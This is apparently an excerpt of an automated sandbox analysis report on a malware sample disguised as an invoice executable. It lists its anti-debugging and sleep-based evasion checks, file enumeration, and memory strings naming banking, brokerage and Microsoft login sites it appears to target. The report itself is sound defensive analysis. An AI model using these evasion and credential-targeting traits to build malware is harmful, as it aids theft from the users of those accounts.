            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
            Source: C:\Windows\SysWOW64\replace.exeWindow / User API: threadDelayed 4373Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeWindow / User API: threadDelayed 5600Jump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87573
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeAPI coverage: 3.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\replace.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\replace.exe TID: 3176Thread sleep count: 4373 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 3176Thread sleep time: -8746000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 3176Thread sleep count: 5600 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 3176Thread sleep time: -11200000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0213C240 FindFirstFileW,FindNextFileW,FindClose,5_2_0213C240
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: 59F79305l7.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 59F79305l7.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 59F79305l7.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 59F79305l7.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 59F79305l7.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 59F79305l7.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 59F79305l7.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 59F79305l7.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 59F79305l7.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 59F79305l7.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 59F79305l7.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 59F79305l7.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 59F79305l7.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 59F79305l7.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 59F79305l7.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2823180801.000001A539ABC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 59F79305l7.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 59F79305l7.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 59F79305l7.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 59F79305l7.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 59F79305l7.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 59F79305l7.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 59F79305l7.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 59F79305l7.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 59F79305l7.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 59F79305l7.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 59F79305l7.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 59F79305l7.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 59F79305l7.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 59F79305l7.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 59F79305l7.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 59F79305l7.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3292212548.000000000106F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeAPI call chain: ExitProcess graph end nodegraph_0-86695
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417473 LdrLoadDll,2_2_00417473
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_040A7110 mov eax, dword ptr fs:[00000030h]0_2_040A7110
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_040A7170 mov eax, dword ptr fs:[00000030h]0_2_040A7170
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_040A5AE0 mov eax, dword ptr fs:[00000030h]0_2_040A5AE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]2_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]2_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]2_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]2_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]2_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]2_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]2_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]2_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]2_2_0390634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]2_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]2_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]2_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]2_2_039062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]2_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]2_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]2_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]2_2_0390625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]2_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]2_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]2_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]2_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]2_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]2_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]2_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]2_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]2_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
